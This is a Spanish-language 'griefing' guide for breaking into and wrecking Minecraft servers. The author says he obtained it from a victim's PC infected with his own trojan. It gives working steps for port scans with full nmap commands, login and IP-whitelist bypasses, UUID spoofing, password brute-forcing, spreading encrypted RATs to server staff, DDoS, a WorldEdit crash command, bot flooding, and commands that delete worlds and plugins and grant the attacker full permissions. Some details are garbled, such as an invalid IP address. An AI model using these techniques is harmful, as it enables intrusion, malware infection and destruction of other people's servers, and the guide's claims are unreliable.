-----------------------------------

Autor: EvilCode
Guia: Griefing
-----------------------------------

Indice:
1) Conceptos basicos
2) Bungeecord
3) UUID Spoof
4) BruteForce
5) Sniffing
6) R.A.T
7) Firewall
8) Server.pro y otros host
9) otras cosas
10) crashear servidores
11) Bots
12) Sacar plugins
13) �Que haces despues?
14) Bypass Authme
15) Bypass IPWhitelist (Server.pro)
16) Bypass StaffSecure
17) Nmap
18) Comandos utiles
19) Bypass IPWhitelist (Avanzado)
20) Crash
21) Bypass AntiUUID-Spoof
22) Bypass AdvancedLogin
23) Bypass AntiVPN

-----------------------------------------------------------------------------------
-------

1) Conceptos basicos:
Los programas ForceOP o cualquier otro que te prometa hackear, darte item/permisos
un servidor
son falsos y probablemente sean virus y no sirvan

este archivo lo consegui por que estana creando un troyano para probar y se lo pase
a varias personas
obvio no le destrui nada de sus pc y ellos ni lo notaron, actualmente el troyano se
encuentra
inhabilitado, en una de las pc infectadas estaba este archivo y lo descarge

aunque este diga guia de Grieffing pondre tambien otra cosas como crashear
servidores
y hacer 'force op' aunque este no es un programa ni nada parecido, tambien a meter
bots
a un servidor y sacar su lista de plugins.

-----------------------------------------------------------------------------------
-------

2) Bungeecord:
Bungeecord es un proxy/protocolo que permite a mas de un servidor ser unido para
que ambos tengan
una puerta unica, es decir, puedes entrar por una ip y terminar en otro servidor.
Bungeecord NO te redirige a un servidor sino que lo atraviesas, por eso es
imposible tocar el servidor
secundario como ejemplo lobby, auth, o modalidades ya que nunca sales del
bungeecord.

ahora que sabemos que es, pasemos a los modos de 'hackearlo':

A) Lo mas tipico es que este el comando /server o /(modalidad) habilitado

si es asi entonces bien puedes ponerte el nickname de una cuenta con rango o
permisos en el servidor
y usar el comando /server para ver las modalidades y /server (modalidad) para
llegar a ella
ejemplo /server skywars usado en el lobby de registro y de esta manera pasas la
contrase�a, tambien
puedes probar /skywars, /lobby, /survival para ver si te conectas directo a la
modalidad

B) El segundo metodo es escaneando los puertos, como sabran bungeecord une

servidores para convertirlo
en network entonces si te pasas el lobby de registro/logeo y entras a la modalidad
puedes saltarte
la contrase�a, un ejemplo:

play.cubecraft.net (este te conecta al bungeecord, es el que todos usamos)

play.cubecraft.net:25566 (este es el lobby de logeo y registro)
play.cubecraft.net:25567 (este es la modalidad survival)

bueno, nosotros entraremos directo a la ip de survival, pero, �como sabremos la ip

de cada modalidad?

Para eso usaremos la herramienta NMAP que se puede descargar aqui:

https://nmap.org/zenmap/
una vez instalado vamos a abrir el 'zenmap gui' que te dejara en el escritorio y
nos pedira un objetivo
'target' en donde pondremos la ip del servidor, si es posible que sea numerica

para sacarla, solamente abrimos CMD en windows, si no sabes como, preciona la tecla
windows + r y escribe CMD
dentro de cmd escribe sin las comillas 'ping ipdelservidor' ejemplo: ping
play.cubecraft.net

Luego en donde dice comando pondremos esto sin las comillas 'nmap -p 20000-65535
-T4 -A -v'
luego quedara asi 'nmap -p 20000-65535 -T4 -A -v ipdelservidor' ejemplo: nmap -p
20000-65535 -T4 -A -v play.cubecraft.net
y le damos donde dice scan o escaneo, cuando este termine iremos al apartado de
'Ports / host' o en espa�ol: puertos y servidores
entonces de alli tomaremos todos los puertos que se han sacado y los copiaremos en
otro lado excepto el puerto 25565

una vez con los puertos de las modalidades las pondremos en minecraft, si estas no
encuentran nada probablemente no sean
del minecraft, de lo contrario, si da ping entonces hemos encontrado las ip de las
modalidades y ya podremos entrar con el
username de un admin u owner

�Que pasas si no puedo entrar?

Probablemente tengan el bungeecord activado entonces solamente puedes entrar desde
un puente y no directo, para esto
nos descargaremos el skillclient aqui: https://skillclient.com/ dentro del cliente
vamos a multijugador y encontraremos
una opcion que dice bungeecord, este le hara enga�ar al servidor para decirle que
nosotros venimos desde el puente bungeecord
y entonces nos dejara pasar, una vez alli ya podremos entrar y grifear todo lo que
quieras.

si el servidor aun no te deja pasar, entonces cuenta con protecci�n adicional y lo

veremos mas adelante

-----------------------------------------------------------------------------------
-------

3) UUID Spoof:
Esta tecnica se la conoce por spoofear la uuid de una cuenta por la de otra con
rango o permisos especiales
spoofear es falcificar y la uuid es un codigo que identifica a una cuenta de
minecraft.

es decir, el owner tiene la uuid 0000001 con el nombre rubik_cube_man

y nuestra cuenta tiene la uuid 777777 con el nombre de xVqlen

entonces, nosotros nos pondremos la uuid de 0000001 a la cuenta de xVqlen

esto nos permitira poner la contrase�a de /login de nuestra cuenta y tener los
permisos de la cuenta con la uuid 777777 en este caso el owner

Para esto usaremos un cliente llamado Dymeth, lo podran buscar en youtube ya que
es conocido, quisas lo suba a mi canal de yt:
https://www.youtube.com/channel/UCxAzEyGnRk3HUJtrUdVdTlw

una vez con el cliente puesto nos vamos a multijugador y donde dice UUID Spoof
aqui nos apareceran 3 campos de escritura, donde diga RealNick pondremos el nuestro
donde diga FakeNick pondremos el de alguien con rango, permisos u OP
Luego las opciones que dice IP la dejaremos igual.

Nos conectaremos al servidor y usaremos /login (nuestra contrase�a) y listo.

-----------------------------------------------------------------------------------
-------

4) Bruteforce (Un poco mas avanzado)

El termino de bruteforce o fuerza bruta hace referencia a cuando forzamos varias
contrase�as para
atinar la que realmente es y poder conseguir entrar. esto no se aplica a minecraft
en general si no
a cualquier tipo de hackeo (Paginas, Bancos, ETC) y con esto no conseguiremos nada
dentro del servidor
pero si podemos 'hackear' la consola del servidor

�Como funciona?
Bueno, primero necesitaremos un diccionario de contrase�as, este tendran anotados
muchisimas contrase�as
ejemplo 0001 0002 0003 0004 0005 0006 0007 0008 0009 0010 y asi hasta atinar la
contrase�a de la VPS

Estos diccionarios pueden hacer de 50 a 1000 intentos por minutos y puede llevar
horas o dias

-> https://github.com/duyetdev/bruteforce-database
-----------------------------------------------------------------------------------
-------

5) Sniffing
Con esta tecnica podras sacar la contrase�a de cualquier servidor y se trata de
simular el envio de datos
de una network por el puerto 22 hacia tu pc a traves de un puente alterno:

-> https://www.youtube.com/watch?v=_eo5johM5i0
-> https://www.youtube.com/watch?v=5jRzw2XZOGc
-> https://sites.google.com/site/seherijemhsen/datos-para-el-loginsniffer

-----------------------------------------------------------------------------------
-------

6) R.A.T
Primero vamos a obtener un programa que se basa en la herramienta adminitrativa
R.A.T
(Herramienta administrativa remota) unos ejemplos son DarkComet o Blackshades,
luego encriptarla
con cualquier encriptador, obtener un vpn, reenviarla a varios puertos, configurar
no-ip y b�sicamente
racionar una computadora. Luego de eso pasamos el archivo encriptado a un usuario
importante en el
servidor (Rango, permiso u OP) y conseguiremos obtener acceso total al pc de
nuestra victima

-> http://shellcore.ml/remotes.php (M�s de 15 rats).

-> http://shellcore.ml/exploits.php?id=33 (Video de demostraci�n de configuraci�n
del tool BlackShades).

-----------------------------------------------------------------------------------
-------

7) Firewall:
El firewall es una protecci�n que tiene casi toda terminal tanto linux (vps) como
windows (nosotros)
en su traducci�n a espa�ol 'pared cortafuegos' es un programa que revisa los
accesos de otras pc
hacia esta y viceversa es decir, el va a revisar que enviamos y que nos envian para
prevenir que
nos hackeen, tiren la net o que un virus se comunique con otra persona en si esta
para protegernos.

Bueno, en las vps hay dos que almenos yo conozco, uno llamado UFW e IPTables pero
ahora nos concentraremos
en el segundo que es IPTables, este impide que nosotros tengamos acceso a siertos
puertos ejemplo puede evitar
lo del puesto 2 (Bungeecord) este obliga a las conexiones entrantes que sean si o
si provenientes de la misma pc
es decir, en las modalidades solamente podran entrar conexiones provenientes del
bungeecord

esto es imposible de bypassear ya que es simple e iptables solamente tiene una

tarea, dejar pasar a ellos
no dejarte pasar a vos. no se le puede enga�ar ni nada por el estilo

Pero no te desiluciones, iptables tiene una manera de pasarlo y es haciendolo

crashear o cerrar la vps
de esta manera su configuracion se restablece y no sabra a quien dejar pasar y a
quien no entonces permitira
cualquier conexion

Para networks peque�as se le puede hacer crashear haciendole un peque�o ataque de

denegaci�n de servicio (DDoS)
AVISO: El DDoS Es legal y almenos en estados unidos la policia sancionan a las
personas que hacen esto

-----------------------------------------------------------------------------------
-------

8) Server.Pro y otros host:

server.pro y otros host tienen una vulnerabilidad que es en la protecci�n, si bien
server.pro
pone todos los servidores en la misma m�quina cual si este servidor es una network
y esta protegido
para solamente aceptas conexiones dentro de la misma pc entonces nosotros podemos
hostear un servidor
bungeecord y hacerlo redirigir hacia las modalidades dentro de la network un
ejemplo:

quiero atacar un servidor cuya ip es mc5.serverminecraft.com:25588

entonces escaneo la ip mc5.serverminecraft.com buscando puertos y los anoto a todos
armo un bungeecord dentro de la misma pagina de host y me daran una ip similiar
ejemplo mc5.serverminecraft.com:30000 entonces en la config.yml del bungeecord
pondre los
puertos escaneados ejemplo:

Server:
aaaaa: mc5.serverminecraft.com:25566
bbbbb: mc5.serverminecraft.com:25567
ccccc: mc5.serverminecraft.com:25568
ddddd: mc5.serverminecraft.com:25569
lobby: mc5.serverminecraft.com:30001

el servidor lobby debe ser otro servidor que yo posea, si no no podremos entrar
para verificar puertos
entraremos a la ip de mi bungee :30000 y este nos llevara a nuestro lobby :30001
entonces pondremos el comando /server y veremos todos los servidores que anotamos
anteriormente
aaaa bbbb cccc dddd y pondremos ejemplo /server aaaaa para verificar

si entramos a la ip de una modalidad de casualidad, solo nos falta averiguar el

nombre de usuario de
un administrador, cualquiera con rango o con OP

-----------------------------------------------------------------------------------
-------

9) Otras cosas:
A) Este es un comando supuestamente privado del polosquad #WeAreGrieffe para el
nmap

nmap -p 1-7,2000-2010,3000-3010,4000-4005,20000-
20010,20100,20200,20300,20400,20500,20600,20700,20800,20900,21000,21001-
21005,21100,21200,21300,21400,21500,21600,21700,21800,21900,22100,22200,22300,22400
,22500,22600,22700,22800,22900,23000,23100,23200,23300,23400,23500,23600,23700,2380
0,23900,24000,24100,24200,24300,24400,24500,24600,24700,24800,24900,27100,27200,273
00,27400,27500,27600,27700,27800,27900,28100,28200,28300,28400,28500,28600,28700,28
800,28900,29100,29200,29300,29400,29500,29600,29700,29800,29900,60000-
60010,10100,10200,10300,10400,10500,10600,10700,10800,10900,11100,11200,11300,11400
,11500,11600,11700,11800,11900,12100,12200,12300,12400,12500,12600,12700,12800,1290
0,13000,13100,13200,13300,13400,13500,13600,13700,13800,13900,14000,14100,14200,143
00,14400,14500,14600,14700,14800,14900,15000,15100,15200,15300,15400,15500,15600,15
700,15800,15900,16100,16200,16300,16400,16500,16600,16700,16800,16900,17100,17200,1
7300,17400,17600,17800,17900,18100,18200,18300,18400,18500,18600,18700,18800,18900,
19100,19200,19300,19400,19500,19600,19700,19800,19900,30000-30010,25555,25000-
25010,25100,25200,25300,25400,25600,25700,25800,25900,26000-26005,40000-
40010,10000-10050,50000-50005,11000-11005,25560-25580,65534,65535, -T5 -Pn -A -v
--open -oN /root/escaneo.txt 127.0.0.1

en 127.0.0.1 va la ip posible numerica del servidor ha atacar

-----------------------------------------------------------------------------------
-------

10) Crashear servidores:

A) podremos crashear un servidor de varias maneras, la que te mostrare ahora sera

la de CustomPayloadPackets Exploid
y esto sera enviando paquetes al servidor en exceso y 'deformes' que el servidor no
pueda procesar y entonces
el servidor no le hara caso a ningun usuario, los cofres no se abriran, los
comandos no funcionaran, nada sucedera
en el servidor ni los usuarios se podran mover solamente funcionara el chat.

para esto usaremos el cliente llamado JigSaw https://www.jigsawclient.net/

nos conectaremos a un servidor y dentro del cliente abriremos el menu de cheats
y daremos click a 'exploid' >> 'server crasher' en la modalidad que queremos tirar

si el servidor no cuenta con proteccion adecuada entonces este se crasheara

no dejes activado mucho tiempo este hack por que cada vez tus fps se tiraran mas
para abajo

y si la dejas mucho tiempo sin activar entonces el servidor se recuperara y volvera

a la normalidad

recomiendo activarlo y desactivarlo (togglearlo) constantemente, es mejor darle un

bind a una tecla
ejemplo la L para activar y desactivar el server crasher

tambien podemos usar el ProClient.

B) tambien podemos crashear servidores usando un comando que esta en el plugin

WorldEdit
y si el servidor no lo tiene bloqueado entonces podremos aprovecharlo bastante bien

este es el comando:
//calc for(i=0;i<256;i++){for(j=0;j<256;j++){for(k=0;k<256;k++){for(l=0;l<256;l++)
{ln(pi)}}}}

-----------------------------------------------------------------------------------
-------

11) Bots:
A) Acontinuacion veremos como meterle bots a un servidor usando DeathBot
Link de descarga: http://www.mediafire.com/file/p6bcie1dr3jew16/DeathBot.rar

abriremos el archivo descargado, una vez abierto haremos lo siguiente:

Donde dice 'Address' pondremos la ip del servidor para atacar

Donde dice 'Version' pondremos la version del servidor para atacar
Donde dice 'Threads' pondremos 2000
Donde dice 'Nickmode' pondremos Random
Donde dice 'Minecraft mode' pondremos cracked

La casilla de spam la activaremos solo si queremos que el bot envia mensajes en el

chat, escribiremos
la cantidad de veces que se repetira el mensaje y abajo el mensaje ejemplo 'bots by
xVqlen'

Vamos a donde dice Avanced arriba alado de Basic y configuraremos cosas a gusto:

Donde dice 'Nicksize' pondremos el tama�o de los nombre de nuestros bots

La casilla de 'stay' es por si queremos que el bot se quede dentro del servidor
Luego introduciremos cuanto tiempo se quedara el bot en el servidor
La casilla de 'achievement spam' es para hacer spam de logros (Inventario)
La casilla de 'bot movement' es para que el bot se mueve por el servidor
Donde dice 'register CMD' es el comando que usaran para registrarse
Donde dice 'login CMD' es el comando que usaran para logearse
La casilla de 'double join' es para que el bot entre dos veces - (Recomendado)
La casilla de 'proxy mode' es la ip que tendra el bot a entrar, se recomienda socks
pero si el
servidor tiene antiproxy entonces podemos en dejarlos en none, pero entonces todos
los bots tendran tu ip

por ultimo daremos click donde dice 'Start' y nos pedira que entremos a una pagina
web
Le damos click al link, esperaremos 5 segundos y daremos a siguiente o continuar
quisas no muestre otra publicidad y debemos tenerlo asi hasta que nos de un codigo
que introduciremos
en el programa y listo, el ataque comenzara.

en un servidor de 1gb de ram o free host de server.pro lo crasheara :D

-----------------------------------------------------------------------------------
-------

12) Sacar plugins:

Aqui podremos sacar plugins de los servidores, para ver cuales esta usando y
planear algo contra eso
Para tal cosa usaremos el jigsaw client

-> https://www.jigsawclient.net/

entraremos al servidor y usaremos la opcion 'plugin steal' o similiar si lo

actualizan al cliente

tambien podemos entrar al servidor con cualquier cliente solo abriendo el chat y
escribiendo
/help o /? y sin precionar enter haremos un espacio y precionaremos la tecla TAB

-----------------------------------------------------------------------------------
-------

13) �Que hacer despues?

�Que haces despues que entramos con la cuenta de un administrador u OP a un
servidor?

A) Darte rango:
Puedes probar darte rango con esa cuenta, si el plugin de rangos es permissionex
entonces usa:

/pex group - para ver los rangos disponibles

/pex user (tunombre) group set (rango) - usalo sin los parentesis para darte rango

B) Puedes borrar todos los mundos:

Puedes borrar los mundos si el servidor tiene el plugin de mundos Multiverse-Core
Entonces puedes usar:

/mv list - para ver los mundos en el servidor

/mv delete (mundo) - sin los parentesis para borrar un mundo del servidor

C) Puedes borrarles los plugins:

Puedes borrar la carpeta de plugins y configuaciones si el servidor tiene el
plugin anterior Multiverse-Core

/mv import plugins normal -t flat -> para tomar la carpeta plugins como un mundo
/mv delete plugins -> para borrar la carpeta

D) Puedes banear a todos

E) Puedes griffearlo con world edit

Pronto...

F) Puedes promocionarte.
/bc <tu mensaje> - ejemplo: /bc SERVER HACKED BY zDarKing

-----------------------------------------------------------------------------------
-------

14) Bypass Authme:

Bueno, este metodo consiste en el server intentar estos comandos:

2- /xlogin changuepassword (password) (Password)
3- /pl (muy pocos servers lo tienen)
4- /pswadminchange
5- /cp unregister

Si esto no funciona, tendremos que proceder a usar Clients.

Por ejemplo el jigsaw, este client en la opcion "Server crasher" muchas veces puede
crashear el authlobby y enviarte al lobby

(Tambien se puede modificar los packetes para que crashee mas)

Tambien, se puede utilizar esto

/register ?????? ??????, Despues pon /register help, despues
/register ?????? ???????????? ???????????? ?????? 3 veces, despues pon /register
help, y despues pon /register ?????? ???????????? ?5??????????? ???555??? 2 veces y
por ultimo pones /login a
Ademas, de este metodo hay uno muy parecido que consiste en esto:
/register ????? ??????, Despues pon /register help y despues espamea muchas
veces /Register ?????? ??????

15) Bypass IPWhitelist:

Bueno, este metodo sirve con todos los server.pro y es muy eficaz.

Consiste en esto:
Para bypassear un IPWhitelist de server.pro lo unico que debes
hacer es ir pidiendo servidores hasta que te den uno con la misma ip
cuando lo tengas le colocas bungeecord te colocas el nick del owner
vas a la configuracion del bungeecord colocas la ip y el puerto dela modalidad
del server que vas a grifear entras por el bungeecord.

Tambien, existe el metodo viejo, que es utilizar 127.0.0.3, 0.0.0.0 o 1.1.1.1

Ademas existe el metodo que consiste a si:
Poner:
127.0.0.3:Port del server
0.0.0.0:Port del server
1.1.1.1:Port del server

16) Bypass StaffSecure

Como bypassear el /pin de algun servidor, bueno esto es de lo mas facil Para
bypassear el plugin StaffSecure lo que tendrias
que hacer es colocar /pin[comandoquedeseasejecutar] Esto viene de mucha ayuda, ya
que asi podrias desactivar el plugin
y literalmente bypassearlo o tirarlo con ddos o jigsaw es otra opcion.

Tambien puedes bypasearlo haciendote ping a tu propia IP.

17) Comandos Nmap

Esto beneficia mucho y facilita el trabajo al estar escaneando.

REFERENCIA: www.nmap.org

Comandos de nmap que sirven mucho:

nmap -p 4,25500-25505,25510,25520,25530-
25620,21245,21249,21650,35500,35565,35575,45597,45500,40994,45565,65500,65535 -T5
-v --open
nmap -p 1-20,1000-1050,22000-27000,28000-28500,40000-42000,65300-65355 -T5 -A -v
-Pn

Estos comandos te serviran bastante, usalos :D

18) COMANDOS DE GRIEF UTILES

/fill ~-15 ~-15 ~-15 ~15 ~15 ~15 air

/pt /sphere 0 10
/pt bc &4&lServer &a&lHacked &6&lBy &3&lPolo&9&lSquad &cOn &4&lY&f&lT&c: &5&liNever
[Griefer]
/pt bc &4&lServer &a&lHacked &6&lBy &c&liNever [Griefer]
/br sphere
/sp area 5
/execute
/fireball
/floodfill lava 5
/floodfill air 5
/execute iNeverGRF 0 0 0 /lp user iNeverGRF permission set *
/execute iNeverGRF 0 0 0 /pex user iNeverGRF add *
/execute iNeverGRF 0 0 0 /pp user iNeverGRF add *
/minecraft:execute iNeverGRF ~ ~ ~ minecraft:op iNeverGRF
/execute iNeverGRF 0 0 0 /upc addpermission iNeverGRF *
/execute iNeverGRF 0 0 0 /permissions player iNeverGRF
/execute iNeverGRF 0 0 0 /manuaddp iNeverGRF *
/execute iNeverGRF 0 0 0 /opguard op iNeverGRF
/bc &4&lServer Hacked By &3&lzDarKing &7// &cwww.t.me/ObsiPvP &d&lON TELEGRAM
/minecraft:gamemode
/minecraft:kick
/minecraft:ban
/kickall
/summon Fireball ~ ~3 ~ {ExplosionPower:0,direction:[0.0,0.0,0.0]}
/fill ~-15 ~-15 ~-15 ~15 ~15 ~15 air
/tellraw @p ["",{"text":"HACKED BY iNever"color":"red","bold":"true"}]
/summon PrimedTnt 0 0 0
/p database (Nick) sqlite:mysql
/essentials opt-out
/title @a title {text:�Hacked By iNeverGRF�}
/minecraft:effect [Staff Nick] 9 255 1000000
/minecraft:effect [Staff Nick] 1 255 1000000
/minecraft:effect [Staff Nick] 15 255 1000000
/minecraft:effect [Staff Nick] 16 255 1000000

19) Bypass IPWhitelist (Avanzado)

Este metodo consiste en usas Proxys, Normalmente conviene usarlo en Wurst

PROXYS:
127.0.0.1:22
127.0.0.3:22
149.457.568.90:22
0.0.0.0:22
8.8.8.8:22

Tambien esta el metodo de ir al puerto que quieres bypasear y poner

.crash IP PORT
y entras rapidamente.

20) Crash

Este metodo es muy sencillo:

//calc for(i=0;i<256;i++){for(j=0;j<256;j++){for(k=0;k<256;k++){for(l=0;l<256;l++)
{ln(pi)}}}}

O Tambien puedes usar el JigSaw y activas la opcion "Server Crasher"

Tambien puedes intentar mandando un payload

21) Bypass AntiUUID Spoof

para bypassearlo tienes que colocar la ip del server en el dymeth client, y que la
UUID del jugador no sea pirata esto
hara que el Plugin quede completamente, bugeado.

O puedes intentar haciendo esto:

Entra con el nick zPirroZ3007 y se bypaseara automaticamente

22) Bypass Advanced Login

Solo tienes que quedarte quieto y pingearte y automaticamente lo bypaseas.

23) Bypass AntiVPN

Esto funciona a si:

Tienes que poner el wurst y usas proxys

PROXYS:
127.0.0.1:22
127.0.0.3:22
149.457.568.90:22
0.0.0.0:22
8.8.8.8:22